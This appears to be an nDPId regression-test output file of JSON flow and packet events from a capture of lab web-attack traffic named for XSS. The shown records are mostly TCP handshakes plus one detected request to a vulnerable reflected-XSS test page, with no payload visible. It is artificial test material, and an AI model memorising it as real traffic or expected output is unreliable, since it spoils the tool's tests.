-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347216659,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347216659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zDVAAD4G+ZqsEAABwKgKMtY0AFD0uxclAAAAAKACchCgVAAAAgQFtAQCCAoBOdsQAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2079,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1499347216659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347216659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1jQ3RTmT9LsXJqAScSB\/8QAAAgQFtAQCCAoD46yGATnbEAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1499347216660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347216660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zDZAAD4G+aGsEAABwKgKMtY0AFD0uxcmN0U5lIAQAOUe+QAAAQEICgE52xAD46yG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347219208,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347219208,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UEtAAD4GdYWsEAABwKgKMtZOAFD4043GAAAAAKACchAjBAAAAgQFtAQCCAoBOd2NAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1499347219208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347219208,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1k7LcrrD+NONx6AScSDqxQAAAgQFtAQCCAoD468DATndjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1499347219209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347219209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UExAAD4GdYysEAABwKgKMtZOAFD4043Hy3K6xIAQAOWJzQAAAQEICgE53Y0D468D"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347220447,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347220447,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ABAAD4G3c+sEAABwKgKMtZcAFBnOTbDAAAAAKACchAKXgAAAgQFtAQCCAoBOd7DAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1499347220447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347220447,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1lzT7Q76Zzk2xKAScSB0OAAAAgQFtAQCCAoD47A5ATnewwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1499347220448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347220448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AFAAD4G3dasEAABwKgKMtZcAFBnOTbE0+0O+4AQAOUTQAAAAQEICgE53sMD47A5"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347221694,"flow_last_seen":1499347221694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347096201,"flow_last_seen":1499347101640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347224338,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347224338,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K5xAAD4GmjSsEAABwKgKMtaEAFDFiskTAAAAAKACchAVyAAAAgQFtAQCCAoBOeKPAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1499347224338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347224338,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1oTh1R3txYrJFKAScSBe+gAAAgQFtAQCCAoD47QGATnijwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2140,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1499347224339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347224339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K51AAD4GmjusEAABwKgKMtaEAFDFiskU4dUd7oAQAOX+AAAAAQEICgE54pAD47QG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347225590,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347225590,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hTdAAD4GQJmsEAABwKgKMtaSAFC4kmb\/AAAAAKACchCDjQAAAgQFtAQCCAoBOePIAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1499347225590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347225590,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1pJbUfWYuJJnAKAScSB6XwAAAgQFtAQCCAoD47U\/ATnjyAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1499347225591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347225591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hThAAD4GQKCsEAABwKgKMtaSAFC4kmcAW1H1mYAQAOUZZgAAAQEICgE548kD47U\/"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347228091,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347228091,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p6lAAD4GHiesEAABwKgKMtasAFAs20GTAAAAAKACchAyJQAAAgQFtAQCCAoBOeY6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1499347228091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347228091,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1qzT8idALNtBlKAScSB8PQAAAgQFtAQCCAoD47ewATnmOgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":1499347228092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347228092,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p6pAAD4GHi6sEAABwKgKMtasAFAs20GU0\/InQYAQAOUbRQAAAQEICgE55joD47ew"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347229416,"flow_last_seen":1499347229416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347229416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1499347229416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aTtAAD4GXJWsEAABwKgKMta6AFA5aI6+AAAAAKACchDXEwAAAgQFtAQCCAoBOeeFAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1499347229417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347229417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1rr5YE9wOWiOv6AScSDSQgAAAgQFtAQCCAoD47j7ATnnhQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1499347229417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347229417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aTxAAD4GXJysEAABwKgKMta6AFA5aI6\/+WBPcYAQAOVxSgAAAQEICgE554UD47j7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347230690,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347230690,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 